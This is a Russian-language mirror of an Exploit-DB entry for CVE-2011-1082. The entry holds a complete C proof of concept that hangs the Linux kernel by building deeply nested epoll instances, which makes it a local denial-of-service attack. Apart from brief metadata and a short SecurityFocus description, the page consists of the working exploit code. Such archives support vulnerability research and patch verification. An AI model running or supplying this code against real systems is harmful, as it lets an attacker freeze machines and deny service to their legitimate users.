- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 35404
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- NELSON ELHAGE
- Тип уязвимости
- DOS
- Платформа
- LINUX
- CVE
- cve-2011-1082
- Дата публикации
- 2011-03-02
		C:
	
	/*
source: https://www.securityfocus.com/bid/46630/info
 
The Linux Kernel epoll Subsystem is prone to multiple local denial-of-service vulnerabilities.
 
Successful exploits will allow attackers to cause the kernel to hang, denying service to legitimate users. 
*/
#include <unistd.h>
#include <sys/epoll.h>
#include <sys/time.h>
#include <stdio.h>
#define SIZE 250
int main(void) {
	int links[SIZE];
	int links2[SIZE];
	int links3[SIZE];
	int links4[SIZE];
	int i, j;
	int ret;
	int ep1, ep2;
	struct timeval start, end;
	struct epoll_event evt = {
		.events = EPOLLIN
	};
	ep1 = epoll_create(1);
	for (i = 0; i < SIZE; i++) {
		links[i] = epoll_create(1);
		ret = epoll_ctl(ep1, EPOLL_CTL_ADD, links[i], &evt);
		if (ret)
			perror("error 1");
	}
	for (i = 0; i < SIZE; i++) {
		links2[i] = epoll_create(1);
		for (j = 0; j < SIZE; j++) {
			epoll_ctl(links[j], EPOLL_CTL_ADD, links2[i], &evt);
			if (ret)
				perror("error 2");
		}
	}
	for (i = 0; i < SIZE; i++) {
		links3[i] = epoll_create(1);
		for (j = 0; j < SIZE; j++) {
			epoll_ctl(links2[j], EPOLL_CTL_ADD, links3[i], &evt);
			if (ret)
				perror("error 3");
		}
	}
	for (i = 0; i < SIZE; i++) {
		links4[i] = epoll_create(1);
		for (j = 0; j < SIZE; j++) {
			epoll_ctl(links3[j], EPOLL_CTL_ADD, links4[i], &evt);
			if (ret)
				perror("error 4");
		}
	}
 	ep2 = epoll_create(1);
	gettimeofday(&start, NULL);
	ret = epoll_ctl(ep2, EPOLL_CTL_ADD, ep1, &evt);
	/* creates a loop */
	//ret = epoll_ctl(links4[499], EPOLL_CTL_ADD, ep1, &evt);
	if (ret)
		perror("error 5");
	gettimeofday(&end, NULL);
	printf("%ld\n", ((end.tv_sec * 1000000 + end.tv_usec)
		- (start.tv_sec * 1000000 + start.tv_usec)));
	return 0;
}- Источник
- www.exploit-db.com
 
 
		